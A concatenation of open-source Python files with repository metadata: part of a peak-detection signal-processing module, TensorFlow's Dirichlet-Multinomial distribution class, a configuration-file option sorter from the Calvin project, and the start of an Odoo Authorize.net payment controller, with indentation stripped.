dump.append(True)
#set algorithm to only find minima now
mx = np.Inf
mn = np.Inf
if index+lookahead >= length:
#end is within lookahead no more peaks can be found
break
continue
#else: #slows shit down this does
# mx = ahead
# mxpos = x_axis[np.where(y_axis[index:index+lookahead]==mx)]
####look for min####
if y > mn+delta and mn != -np.Inf:
#Minima peak candidate found
#look ahead in signal to ensure that this is a peak and not jitter
if y_axis[index:index+lookahead].min() > mn:
min_peaks.append([mnpos, mn])
dump.append(False)
#set algorithm to only find maxima now
mn = -np.Inf
mx = -np.Inf
if index+lookahead >= length:
#end is within lookahead no more peaks can be found
break
#else: #slows shit down this does
# mn = ahead
# mnpos = x_axis[np.where(y_axis[index:index+lookahead]==mn)]
#Remove the false hit on the first value of the y_axis
try:
if dump[0]:
max_peaks.pop(0)
else:
min_peaks.pop(0)
del dump
except IndexError:
#no peaks were found, should the function return empty lists?
pass
return [max_peaks, min_peaks]
def peakdetect_fft(y_axis, x_axis, pad_len = 5):
"""
Performs a FFT calculation on the data and zero-pads the results to
increase the time domain resolution after performing the inverse fft and
send the data to the 'peakdetect' function for peak
detection.
Omitting the x_axis is forbidden as it would make the resulting x_axis
value silly if it was returned as the index 50.234 or similar.
Will find at least 1 less peak then the 'peakdetect_zero_crossing'
function, but should result in a more precise value of the peak as
resolution has been increased. Some peaks are lost in an attempt to
minimize spectral leakage by calculating the fft between two zero
crossings for n amount of signal periods.
The biggest time eater in this function is the ifft and thereafter it's
the 'peakdetect' function which takes only half the time of the ifft.
Speed improvementd could include to check if 2**n points could be used for
fft and ifft or change the 'peakdetect' to the 'peakdetect_zero_crossing',
which is maybe 10 times faster than 'peakdetct'. The pro of 'peakdetect'
is that it resutls in one less lost peak. It should also be noted that the
time used by the ifft function can change greatly depending on the input.
keyword arguments:
y_axis -- A list containg the signal over which to find peaks
x_axis -- A x-axis whose values correspond to the y_axis list and is used
in the return to specify the postion of the peaks.
pad_len -- (optional) By how many times the time resolution should be
increased by, e.g. 1 doubles the resolution. The amount is rounded up
to the nearest 2 ** n amount (default: 5)
return -- two lists [max_peaks, min_peaks] containing the positive and
negative peaks respectively. Each cell of the lists contains a tupple
of: (position, peak_value)
to get the average peak value do: np.mean(max_peaks, 0)[1] on the
results to unpack one of the lists into x, y coordinates do:
x, y = zip(*tab)
"""
# check input data
x_axis, y_axis = _datacheck_peakdetect(x_axis, y_axis)
zero_indices = zero_crossings(y_axis, window = 11)
#select a n amount of periods
last_indice = - 1 - (1 - len(zero_indices) & 1)
# Calculate the fft between the first and last zero crossing
# this method could be ignored if the begining and the end of the signal
# are discardable as any errors induced from not using whole periods
# should mainly manifest in the beginning and the end of the signal, but
# not in the rest of the signal
fft_data = fft(y_axis[zero_indices[0]:zero_indices[last_indice]])
padd = lambda x, c: x[:len(x) // 2] + [0] * c + x[len(x) // 2:]
n = lambda x: int(log(x)/log(2)) + 1
# padds to 2**n amount of samples
fft_padded = padd(list(fft_data), 2 **
n(len(fft_data) * pad_len) - len(fft_data))
# There is amplitude decrease directly proportional to the sample increase
sf = len(fft_padded) / float(len(fft_data))
# There might be a leakage giving the result an imaginary component
# Return only the real component
y_axis_ifft = ifft(fft_padded).real * sf #(pad_len + 1)
x_axis_ifft = np.linspace(
x_axis[zero_indices[0]], x_axis[zero_indices[last_indice]],
len(y_axis_ifft))
# get the peaks to the interpolated waveform
max_peaks, min_peaks = peakdetect(y_axis_ifft, x_axis_ifft, 500,
delta = abs(np.diff(y_axis).max() * 2))
#max_peaks, min_peaks = peakdetect_zero_crossing(y_axis_ifft, x_axis_ifft)
# store one 20th of a period as waveform data
data_len = int(np.diff(zero_indices).mean()) / 10
data_len += 1 - data_len & 1
fitted_wave = []
for peaks in [max_peaks, min_peaks]:
peak_fit_tmp = []
index = 0
for peak in peaks:
index = np.where(x_axis_ifft[index:]==peak[0])[0][0] + index
x_fit_lim = x_axis_ifft[index - data_len // 2:
index + data_len // 2 + 1]
y_fit_lim = y_axis_ifft[index - data_len // 2:
index + data_len // 2 + 1]
peak_fit_tmp.append([x_fit_lim, y_fit_lim])
fitted_wave.append(peak_fit_tmp)
#pylab.plot(range(len(fft_data)), fft_data)
#pylab.show()
pylab.plot(x_axis, y_axis)
pylab.hold(True)
pylab.plot(x_axis_ifft, y_axis_ifft)
#for max_p in max_peaks:
# pylab.plot(max_p[0], max_p[1], 'xr')
pylab.show()
return [max_peaks, min_peaks]
def peakdetect_parabole(y_axis, x_axis, points = 9):
"""
Function for detecting local maximas and minmias in a signal.
Discovers peaks by fitting the model function: y = k (x - tau) ** 2 + m
to the peaks. The amount of points used in the fitting is set by the
points argument.
Omitting the x_axis is forbidden as it would make the resulting x_axis
value silly if it was returned as index 50.234 or similar.
will find the same amount of peaks as the 'peakdetect_zero_crossing'
function, but might result in a more precise value of the peak.
keyword arguments:
y_axis -- A list containg the signal over which to find peaks
x_axis -- A x-axis whose values correspond to the y_axis list and is used
in the return to specify the postion of the peaks.
points -- (optional) How many points around the peak should be used during
curve fitting, must be odd (default: 9)
return -- two lists [max_peaks, min_peaks] containing the positive and
negative peaks respectively. Each cell of the lists contains a list
of: (position, peak_value)
to get the average peak value do: np.mean(max_peaks, 0)[1] on the
results to unpack one of the lists into x, y coordinates do:
x, y = zip(*max_peaks)
"""
# check input data
x_axis, y_axis = _datacheck_peakdetect(x_axis, y_axis)
# make the points argument odd
points += 1 - points % 2
#points += 1 - int(points) & 1 slower when int conversion needed
# get raw peaks
max_raw, min_raw = peakdetect_zero_crossing(y_axis)
# define output variable
max_peaks = []
min_peaks = []
max_ = _peakdetect_parabole_fitter(max_raw, x_axis, y_axis, points)
min_ = _peakdetect_parabole_fitter(min_raw, x_axis, y_axis, points)
max_peaks = [[x[0], x[1]] for x in max_]
max_fitted = [x[-1] for x in max_]
min_peaks = [[x[0], x[1]] for x in min_]
min_fitted = [x[-1] for x in min_]
#pylab.plot(x_axis, y_axis)
#pylab.hold(True)
#for max_p, max_f in zip(max_peaks, max_fitted):
# pylab.plot(max_p[0], max_p[1], 'x')
# pylab.plot(max_f[0], max_f[1], 'o', markersize = 2)
#for min_p, min_f in zip(min_peaks, min_fitted):
# pylab.plot(min_p[0], min_p[1], 'x')
# pylab.plot(min_f[0], min_f[1], 'o', markersize = 2)
#pylab.show()
return [max_peaks, min_peaks]
def peakdetect_sine(y_axis, x_axis, points = 9, lock_frequency = False):
"""
Function for detecting local maximas and minmias in a signal.
Discovers peaks by fitting the model function:
y = A * sin(2 * pi * f * x - tau) to the peaks. The amount of points used
in the fitting is set by the points argument.
Omitting the x_axis is forbidden as it would make the resulting x_axis
value silly if it was returned as index 50.234 or similar.
will find the same amount of peaks as the 'peakdetect_zero_crossing'
function, but might result in a more precise value of the peak.
The function might have some problems if the sine wave has a
non-negligible total angle i.e. a k*x component, as this messes with the
internal offset calculation of the peaks, might be fixed by fitting a
k * x + m function to the peaks for offset calculation.
keyword arguments:
y_axis -- A list containg the signal over which to find peaks
x_axis -- A x-axis whose values correspond to the y_axis list and is used
in the return to specify the postion of the peaks.
points -- (optional) How many points around the peak should be used during
curve fitting, must be odd (default: 9)
lock_frequency -- (optional) Specifies if the frequency argument of the
model function should be locked to the value calculated from the raw
peaks or if optimization process may tinker with it. (default: False)
return -- two lists [max_peaks, min_peaks] containing the positive and
negative peaks respectively. Each cell of the lists contains a tupple
of: (position, peak_value)
to get the average peak value do: np.mean(max_peaks, 0)[1] on the
results to unpack one of the lists into x, y coordinates do:
x, y = zip(*tab)
"""
# check input data
x_axis, y_axis = _datacheck_peakdetect(x_axis, y_axis)
# make the points argument odd
points += 1 - points % 2
#points += 1 - int(points) & 1 slower when int conversion needed
# get raw peaks
max_raw, min_raw = peakdetect_zero_crossing(y_axis)
# define output variable
max_peaks = []
min_peaks = []
# get global offset
offset = np.mean([np.mean(max_raw, 0)[1], np.mean(min_raw, 0)[1]])
# fitting a k * x + m function to the peaks might be better
#offset_func = lambda x, k, m: k * x + m
# calculate an approximate frequenzy of the signal
Hz = []
for raw in [max_raw, min_raw]:
if len(raw) > 1:
peak_pos = [x_axis[index] for index in zip(*raw)[0]]
Hz.append(np.mean(np.diff(peak_pos)))
Hz = 1 / np.mean(Hz)
# model function
# if cosine is used then tau could equal the x position of the peak
# if sine were to be used then tau would be the first zero crossing
if lock_frequency:
func = lambda x, A, tau: A * np.sin(2 * pi * Hz * (x - tau) + pi / 2)
else:
func = lambda x, A, Hz, tau: A * np.sin(2 * pi * Hz * (x - tau) +
pi / 2)
#func = lambda x, A, Hz, tau: A * np.cos(2 * pi * Hz * (x - tau))
#get peaks
fitted_peaks = []
for raw_peaks in [max_raw, min_raw]:
peak_data = []
for peak in raw_peaks:
index = peak[0]
x_data = x_axis[index - points // 2: index + points // 2 + 1]
y_data = y_axis[index - points // 2: index + points // 2 + 1]
# get a first approximation of tau (peak position in time)
tau = x_axis[index]
# get a first approximation of peak amplitude
A = peak[1]
# build list of approximations
if lock_frequency:
p0 = (A, tau)
else:
p0 = (A, Hz, tau)
# subtract offset from waveshape
y_data -= offset
popt, pcov = curve_fit(func, x_data, y_data, p0)
# retrieve tau and A i.e x and y value of peak
x = popt[-1]
y = popt[0]
# create a high resolution data set for the fitted waveform
x2 = np.linspace(x_data[0], x_data[-1], points * 10)
y2 = func(x2, *popt)
# add the offset to the results
y += offset
y2 += offset
y_data += offset
peak_data.append([x, y, [x2, y2]])
fitted_peaks.append(peak_data)
# structure date for output
max_peaks = [[x[0], x[1]] for x in fitted_peaks[0]]
max_fitted = [x[-1] for x in fitted_peaks[0]]
min_peaks = [[x[0], x[1]] for x in fitted_peaks[1]]
min_fitted = [x[-1] for x in fitted_peaks[1]]
#pylab.plot(x_axis, y_axis)
#pylab.hold(True)
#for max_p, max_f in zip(max_peaks, max_fitted):
# pylab.plot(max_p[0], max_p[1], 'x')
# pylab.plot(max_f[0], max_f[1], 'o', markersize = 2)
#for min_p, min_f in zip(min_peaks, min_fitted):
# pylab.plot(min_p[0], min_p[1], 'x')
# pylab.plot(min_f[0], min_f[1], 'o', markersize = 2)
#pylab.show()
return [max_peaks, min_peaks]
def peakdetect_sine_locked(y_axis, x_axis, points = 9):
"""
Convinience function for calling the 'peakdetect_sine' function with
the lock_frequency argument as True.
keyword arguments:
y_axis -- A list containg the signal over which to find peaks
x_axis -- A x-axis whose values correspond to the y_axis list and is used
in the return to specify the postion of the peaks.
points -- (optional) How many points around the peak should be used during
curve fitting, must be odd (default: 9)
return -- see 'peakdetect_sine'
"""
return peakdetect_sine(y_axis, x_axis, points, True)
def peakdetect_zero_crossing(y_axis, x_axis = None, window = 11):
"""
Function for detecting local maximas and minmias in a signal.
Discovers peaks by dividing the signal into bins and retrieving the
maximum and minimum value of each the even and odd bins respectively.
Division into bins is performed by smoothing the curve and finding the
zero crossings.
Suitable for repeatable signals, where some noise is tolerated. Excecutes
faster than 'peakdetect', although this function will break if the offset
of the signal is too large. It should also be noted that the first and
last peak will probably not be found, as this function only can find peaks
between the first and last zero crossing.
keyword arguments:
y_axis -- A list containg the signal over which to find peaks
x_axis -- (optional) A x-axis whose values correspond to the y_axis list
and is used in the return to specify the postion of the peaks. If
omitted an index of the y_axis is used. (default: None)
window -- the dimension of the smoothing window; should be an odd integer
(default: 11)
return -- two lists [max_peaks, min_peaks] containing the positive and
negative peaks respectively. Each cell of the lists contains a tupple
of: (position, peak_value)
to get the average peak value do: np.mean(max_peaks, 0)[1] on the
results to unpack one of the lists into x, y coordinates do:
x, y = zip(*tab)
"""
# check input data
x_axis, y_axis = _datacheck_peakdetect(x_axis, y_axis)
zero_indices = zero_crossings(y_axis, window = window)
period_lengths = np.diff(zero_indices)
bins_y = [y_axis[index:index + diff] for index, diff in
zip(zero_indices, period_lengths)]
bins_x = [x_axis[index:index + diff] for index, diff in
zip(zero_indices, period_lengths)]
even_bins_y = bins_y[::2]
odd_bins_y = bins_y[1::2]
even_bins_x = bins_x[::2]
odd_bins_x = bins_x[1::2]
hi_peaks_x = []
lo_peaks_x = []
#check if even bin contains maxima
if abs(even_bins_y[0].max()) > abs(even_bins_y[0].min()):
hi_peaks = [bin.max() for bin in even_bins_y]
lo_peaks = [bin.min() for bin in odd_bins_y]
# get x values for peak
for bin_x, bin_y, peak in zip(even_bins_x, even_bins_y, hi_peaks):
hi_peaks_x.append(bin_x[np.where(bin_y==peak)[0][0]])
for bin_x, bin_y, peak in zip(odd_bins_x, odd_bins_y, lo_peaks):
lo_peaks_x.append(bin_x[np.where(bin_y==peak)[0][0]])
else:
hi_peaks = [bin.max() for bin in odd_bins_y]
lo_peaks = [bin.min() for bin in even_bins_y]
# get x values for peak
for bin_x, bin_y, peak in zip(odd_bins_x, odd_bins_y, hi_peaks):
hi_peaks_x.append(bin_x[np.where(bin_y==peak)[0][0]])
for bin_x, bin_y, peak in zip(even_bins_x, even_bins_y, lo_peaks):
lo_peaks_x.append(bin_x[np.where(bin_y==peak)[0][0]])
max_peaks = [[x, y] for x,y in zip(hi_peaks_x, hi_peaks)]
min_peaks = [[x, y] for x,y in zip(lo_peaks_x, lo_peaks)]
return [max_peaks, min_peaks]
def _smooth(x, window_len=11, window='hanning'):
"""
smooth the data using a window of the requested size.
This method is based on the convolution of a scaled window on the signal.
The signal is prepared by introducing reflected copies of the signal
(with the window size) in both ends so that transient parts are minimized
in the begining and end part of the output signal.
input:
x: the input signal
window_len: the dimension of the smoothing window; should be an odd
integer
window: the type of window from 'flat', 'hanning', 'hamming',
'bartlett', 'blackman'
flat window will produce a moving average smoothing.
output:
the smoothed signal
example:
t = linspace(-2,2,0.1)
x = sin(t)+randn(len(t))*0.1
y = _smooth(x)
see also:
numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman,
numpy.convolve, scipy.signal.lfilter
TODO: the window parameter could be the window itself if a list instead of
a string
"""
if x.ndim != 1:
raise ValueError("smooth only accepts 1 dimension arrays.")
if x.size < window_len:
raise ValueError("Input vector needs to be bigger than window size.")
if window_len<3:
return x
if not window in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:
raise ValueError("Window is not one of '{0}', '{1}', '{2}', '{3}', '{4}'".format(
*('flat', 'hanning', 'hamming', 'bartlett', 'blackman')))
s = np.r_[x[window_len-1:0:-1], x, x[-1:-window_len:-1]]
#print(len(s))
if window == 'flat': #moving average
w = np.ones(window_len,'d')
else:
w = eval('np.' + window + '(window_len)')
y = np.convolve(w / w.sum(), s, mode = 'valid')
return y
def zero_crossings(y_axis, window = 11):
"""
Algorithm to find zero crossings. Smoothens the curve and finds the
zero-crossings by looking for a sign change.
keyword arguments:
y_axis -- A list containg the signal over which to find zero-crossings
window -- the dimension of the smoothing window; should be an odd integer
(default: 11)
return -- the index for each zero-crossing
"""
# smooth the curve
length = len(y_axis)
x_axis = np.asarray(list(range(length)), int)
# discard tail of smoothed signal
y_axis = _smooth(y_axis, window)[:length]
zero_crossings = np.where(np.diff(np.sign(y_axis)))[0]
indices = [x_axis[index] for index in zero_crossings]
# check if zero-crossings are valid
diff = np.diff(indices)
if diff.std() / diff.mean() > 0.2:
print(diff.std() / diff.mean())
print(np.diff(indices))
raise ValueError("False zero-crossings found, indicates problem {0} or {1}".format(
"with smoothing window", "problem with offset"))
# check if any zero crossings were found
if len(zero_crossings) < 1:
raise ValueError("No zero crossings found")
return indices
# used this to test the fft function's sensitivity to spectral leakage
#return indices + np.asarray(30 * np.random.randn(len(indices)), int)
############################Frequency calculation#############################
# diff = np.diff(indices)
# time_p_period = diff.mean()
#
# if diff.std() / time_p_period > 0.1:
# raise ValueError,
# "smoothing window too small, false zero-crossing found"
#
# #return frequency
# return 1.0 / time_p_period
##############################################################################
def _test_zero():
_max, _min = peakdetect_zero_crossing(y,x)
def _test():
_max, _min = peakdetect(y,x, delta=0.30)
def _test_graph():
i = 10000
x = np.linspace(0,3.7*pi,i)
y = (0.3*np.sin(x) + np.sin(1.3 * x) + 0.9 * np.sin(4.2 * x) + 0.06 *
np.random.randn(i))
y *= -1
x = list(range(i))
_max, _min = peakdetect(y,x,750, 0.30)
xm = [p[0] for p in _max]
ym = [p[1] for p in _max]
xn = [p[0] for p in _min]
yn = [p[1] for p in _min]
plot = pylab.plot(x,y)
pylab.hold(True)
pylab.plot(xm, ym, 'r+')
pylab.plot(xn, yn, 'g+')
_max, _min = peak_det_bad.peakdetect(y, 0.7, x)
xm = [p[0] for p in _max]
ym = [p[1] for p in _max]
xn = [p[0] for p in _min]
yn = [p[1] for p in _min]
pylab.plot(xm, ym, 'y*')
pylab.plot(xn, yn, 'k*')
pylab.show()
if __name__ == "__main__":
from math import pi
import pylab
i = 10000
x = np.linspace(0,3.7*pi,i)
y = (0.3*np.sin(x) + np.sin(1.3 * x) + 0.9 * np.sin(4.2 * x) + 0.06 *
np.random.randn(i))
y *= -1
_max, _min = peakdetect(y, x, 750, 0.30)
xm = [p[0] for p in _max]
ym = [p[1] for p in _max]
xn = [p[0] for p in _min]
yn = [p[1] for p in _min]
plot = pylab.plot(x, y)
pylab.hold(True)
pylab.plot(xm, ym, 'r+')
pylab.plot(xn, yn, 'g+')
pylab.show()
| gpl-2.0 |
caisq/tensorflow | tensorflow/python/ops/distributions/dirichlet_multinomial.py | 17 | 13343 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The DirichletMultinomial distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import special_math_ops
from tensorflow.python.ops.distributions import distribution
from tensorflow.python.ops.distributions import util as distribution_util
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"DirichletMultinomial",
]
_dirichlet_multinomial_sample_note = """For each batch of counts,
`value = [n_0, ..., n_{K-1}]`, `P[value]` is the probability that after
sampling `self.total_count` draws from this Dirichlet-Multinomial distribution,
the number of draws falling in class `j` is `n_j`. Since this definition is
[exchangeable](https://en.wikipedia.org/wiki/Exchangeable_random_variables);
different sequences have the same counts so the probability includes a
combinatorial coefficient.
Note: `value` must be a non-negative tensor with dtype `self.dtype`, have no
fractional components, and such that
`tf.reduce_sum(value, -1) = self.total_count`. Its shape must be broadcastable
with `self.concentration` and `self.total_count`."""
@tf_export("distributions.DirichletMultinomial")
class DirichletMultinomial(distribution.Distribution):
"""Dirichlet-Multinomial compound distribution.
The Dirichlet-Multinomial distribution is parameterized by a (batch of)
length-`K` `concentration` vectors (`K > 1`) and a `total_count` number of
trials, i.e., the number of trials per draw from the DirichletMultinomial. It
is defined over a (batch of) length-`K` vector `counts` such that
`tf.reduce_sum(counts, -1) = total_count`. The Dirichlet-Multinomial is
identically the Beta-Binomial distribution when `K = 2`.
#### Mathematical Details
The Dirichlet-Multinomial is a distribution over `K`-class counts, i.e., a
length-`K` vector of non-negative integer `counts = n = [n_0, ..., n_{K-1}]`.
The probability mass function (pmf) is,
```none
pmf(n; alpha, N) = Beta(alpha + n) / (prod_j n_j!) / Z
Z = Beta(alpha) / N!
```
where:
* `concentration = alpha = [alpha_0, ..., alpha_{K-1}]`, `alpha_j > 0`,
* `total_count = N`, `N` a positive integer,
* `N!` is `N` factorial, and,
* `Beta(x) = prod_j Gamma(x_j) / Gamma(sum_j x_j)` is the
[multivariate beta function](
https://en.wikipedia.org/wiki/Beta_function#Multivariate_beta_function),
and,
* `Gamma` is the [gamma function](
https://en.wikipedia.org/wiki/Gamma_function).
Dirichlet-Multinomial is a [compound distribution](
https://en.wikipedia.org/wiki/Compound_probability_distribution), i.e., its
samples are generated as follows.
1. Choose class probabilities:
`probs = [p_0,...,p_{K-1}] ~ Dir(concentration)`
2. Draw integers:
`counts = [n_0,...,n_{K-1}] ~ Multinomial(total_count, probs)`
The last `concentration` dimension parametrizes a single Dirichlet-Multinomial
distribution. When calling distribution functions (e.g., `dist.prob(counts)`),
`concentration`, `total_count` and `counts` are broadcast to the same shape.
The last dimension of `counts` corresponds single Dirichlet-Multinomial
distributions.
Distribution parameters are automatically broadcast in all functions; see
examples for details.
#### Pitfalls
The number of classes, `K`, must not exceed:
- the largest integer representable by `self.dtype`, i.e.,
`2**(mantissa_bits+1)` (IEE754),
- the maximum `Tensor` index, i.e., `2**31-1`.
In other words,
```python
K <= min(2**31-1, {
tf.float16: 2**11,
tf.float32: 2**24,
tf.float64: 2**53 }[param.dtype])
```
Note: This condition is validated only when `self.validate_args = True`.
#### Examples
```python
alpha = [1., 2., 3.]
n = 2.
dist = DirichletMultinomial(n, alpha)
```
Creates a 3-class distribution, with the 3rd class is most likely to be
drawn.
The distribution functions can be evaluated on counts.
```python
# counts same shape as alpha.
counts = [0., 0., 2.]
dist.prob(counts) # Shape []
# alpha will be broadcast to [[1., 2., 3.], [1., 2., 3.]] to match counts.
counts = [[1., 1., 0.], [1., 0., 1.]]
dist.prob(counts) # Shape [2]
# alpha will be broadcast to shape [5, 7, 3] to match counts.
counts = [[...]] # Shape [5, 7, 3]
dist.prob(counts) # Shape [5, 7]
```
Creates a 2-batch of 3-class distributions.
```python
alpha = [[1., 2., 3.], [4., 5., 6.]] # Shape [2, 3]
n = [3., 3.]
dist = DirichletMultinomial(n, alpha)
# counts will be broadcast to [[2., 1., 0.], [2., 1., 0.]] to match alpha.
counts = [2., 1., 0.]
dist.prob(counts) # Shape [2]
```
"""
# TODO(b/27419586) Change docstring for dtype of concentration once int
# allowed.
def __init__(self,
total_count,
concentration,
validate_args=False,
allow_nan_stats=True,
name="DirichletMultinomial"):
"""Initialize a batch of DirichletMultinomial distributions.
Args:
total_count: Non-negative floating point tensor, whose dtype is the same
as `concentration`. The shape is broadcastable to `[N1,..., Nm]` with
`m >= 0`. Defines this as a batch of `N1 x ... x Nm` different
Dirichlet multinomial distributions. Its components should be equal to
integer values.
concentration: Positive floating point tensor, whose dtype is the
same as `n` with shape broadcastable to `[N1,..., Nm, K]` `m >= 0`.
Defines this as a batch of `N1 x ... x Nm` different `K` class Dirichlet
multinomial distributions.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or
more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
"""
parameters = dict(locals())
with ops.name_scope(name, values=[total_count, concentration]) as name:
# Broadcasting works because:
# * The broadcasting convention is to prepend dimensions of size [1], and
# we use the last dimension for the distribution, whereas
# the batch dimensions are the leading dimensions, which forces the
# distribution dimension to be defined explicitly (i.e. it cannot be
# created automatically by prepending). This forces enough explicitness.
# * All calls involving `counts` eventually require a broadcast between
# `counts` and concentration.
self._total_count = ops.convert_to_tensor(total_count, name="total_count")
if validate_args:
self._total_count = (
distribution_util.embed_check_nonnegative_integer_form(
self._total_count))
self._concentration = self._maybe_assert_valid_concentration(
ops.convert_to_tensor(concentration,
name="concentration"),
validate_args)
self._total_concentration = math_ops.reduce_sum(self._concentration, -1)
super(DirichletMultinomial, self).__init__(
dtype=self._concentration.dtype,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
reparameterization_type=distribution.NOT_REPARAMETERIZED,
parameters=parameters,
graph_parents=[self._total_count,
self._concentration],
name=name)
@property
def total_count(self):
"""Number of trials used to construct a sample."""
return self._total_count
@property
def concentration(self):
"""Concentration parameter; expected prior counts for that coordinate."""
return self._concentration
@property
def total_concentration(self):
"""Sum of last dim of concentration parameter."""
return self._total_concentration
def _batch_shape_tensor(self):
return array_ops.shape(self.total_concentration)
def _batch_shape(self):
return self.total_concentration.get_shape()
def _event_shape_tensor(self):
return array_ops.shape(self.concentration)[-1:]
def _event_shape(self):
# Event shape depends only on total_concentration, not "n".
return self.concentration.get_shape().with_rank_at_least(1)[-1:]
def _sample_n(self, n, seed=None):
n_draws = math_ops.cast(self.total_count, dtype=dtypes.int32)
k = self.event_shape_tensor()[0]
unnormalized_logits = array_ops.reshape(
math_ops.log(random_ops.random_gamma(
shape=[n],
alpha=self.concentration,
dtype=self.dtype,
seed=seed)),
shape=[-1, k])
draws = random_ops.multinomial(
logits=unnormalized_logits,
num_samples=n_draws,
seed=distribution_util.gen_new_seed(seed, salt="dirichlet_multinomial"))
x = math_ops.reduce_sum(array_ops.one_hot(draws, depth=k), -2)
final_shape = array_ops.concat([[n], self.batch_shape_tensor(), [k]], 0)
x = array_ops.reshape(x, final_shape)
return math_ops.cast(x, self.dtype)
@distribution_util.AppendDocstring(_dirichlet_multinomial_sample_note)
def _log_prob(self, counts):
counts = self._maybe_assert_valid_sample(counts)
ordered_prob = (
special_math_ops.lbeta(self.concentration + counts)
- special_math_ops.lbeta(self.concentration))
return ordered_prob + distribution_util.log_combinations(
self.total_count, counts)
@distribution_util.AppendDocstring(_dirichlet_multinomial_sample_note)
def _prob(self, counts):
return math_ops.exp(self._log_prob(counts))
def _mean(self):
return self.total_count * (self.concentration /
self.total_concentration[..., array_ops.newaxis])
@distribution_util.AppendDocstring(
"""The covariance for each batch member is defined as the following:
```none
Var(X_j) = n * alpha_j / alpha_0 * (1 - alpha_j / alpha_0) *
(n + alpha_0) / (1 + alpha_0)
```
where `concentration = alpha` and
`total_concentration = alpha_0 = sum_j alpha_j`.
The covariance between elements in a batch is defined as:
```none
Cov(X_i, X_j) = -n * alpha_i * alpha_j / alpha_0 ** 2 *
(n + alpha_0) / (1 + alpha_0)
```
""")
def _covariance(self):
x = self._variance_scale_term() * self._mean()
return array_ops.matrix_set_diag(
-math_ops.matmul(x[..., array_ops.newaxis],
x[..., array_ops.newaxis, :]), # outer prod
self._variance())
def _variance(self):
scale = self._variance_scale_term()
x = scale * self._mean()
return x * (self.total_count * scale - x)
def _variance_scale_term(self):
"""Helper to `_covariance` and `_variance` which computes a shared scale."""
# We must take care to expand back the last dim whenever we use the
# total_concentration.
c0 = self.total_concentration[..., array_ops.newaxis]
return math_ops.sqrt((1. + c0 / self.total_count) / (1. + c0))
def _maybe_assert_valid_concentration(self, concentration, validate_args):
"""Checks the validity of the concentration parameter."""
if not validate_args:
return concentration
concentration = distribution_util.embed_check_categorical_event_shape(
concentration)
return control_flow_ops.with_dependencies([
check_ops.assert_positive(
concentration,
message="Concentration parameter must be positive."),
], concentration)
def _maybe_assert_valid_sample(self, counts):
"""Check counts for proper shape, values, then return tensor version."""
if not self.validate_args:
return counts
counts = distribution_util.embed_check_nonnegative_integer_form(counts)
return control_flow_ops.with_dependencies([
check_ops.assert_equal(
self.total_count, math_ops.reduce_sum(counts, -1),
message="counts last-dimension must sum to `self.total_count`"),
], counts)
| apache-2.0 |
josrolgil/exjobbCalvin | calvin/utilities/confsort.py | 3 | 3435 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Option Parser sorting module.
This module implements a sorting method for options in a
configuration file.
"""
from operator import itemgetter, attrgetter, methodcaller
class Options:
"""
Collection of options.
"""
def __init__(self):
self.options = []
def insert(self, option):
"""
Insert option in to options
"""
self.options.append(option)
def __repr__(self):
return repr(self.options)
def dict(self):
"""
Return unstructured dictionary with key, value of options.
"""
optionsdict = {}
for option in self.options:
optionsdict[option.key] = option.value
return optionsdict
def compare(self, comparable):
if comparable.getvar() == None: # Non variable options pass
return 0
for option in self.options:
if comparable.getvar() == option.key:
return 1 # Variables are lower
return 0 # Non resolvable variables can go high
def sort(self):
"""
Sort options based on definition before use.
"""
self.options = sorted(self.options,
key=self.compare)
return self.options
class Option:
"""
Class to store one option in a section of a ConfigParser.
"""
def __init__(self, key, value):
self.key = key.strip()
self.value = value.strip()
def __repr__(self):
return self.key
def getvar(self):
"""
Find variable in a string.
"""
variable = "".join(self.value.split("$")[1:])
variable = variable.split("/")[0]
return variable
def reorder(fname):
"""
Reorder fields in a configuration file so that
assignments of variables comes before use.
"""
fp = open(fname, 'r+')
options = Options()
configresult = {}
section = ""
configresult[section] = Options()
for line in fp.readlines():
line = line.strip()
if line.startswith("["):
# New section
section = line
configresult[section] = Options()
elif line.startswith("#"):
pass
# Lonely comments are removed
else:
# Store an option
try:
key, value = line.split("=")
configresult[section].insert(Option(key, value))
except ValueError:
pass # Ignore all weird lines
fp.seek(0)
fp.truncate()
for section in configresult:
fp.write("{}\n".format(section))
configresult[section].sort() # Sort options in this section
for option in configresult[section].options:
fp.write("{}={}\n".format(option.key, option.value))
fp.close()
| apache-2.0 |
salaria/odoo | addons/payment_authorize/controllers/main.py | 247 | 1261 | # -*- coding: utf-8 -*-
import pprint
import logging
import urlparse
from openerp import http
from openerp.http import request
_logger = logging.getLogger(__name__)
class AuthorizeController(http.Controller):
_return_url = '/payment/authorize/return/'
_cancel_url = '/payment/authorize/cancel/'
@http.route([
'/payment/authorize/return/',
'/payment/authorize/cancel/',
], type='http', auth='public')
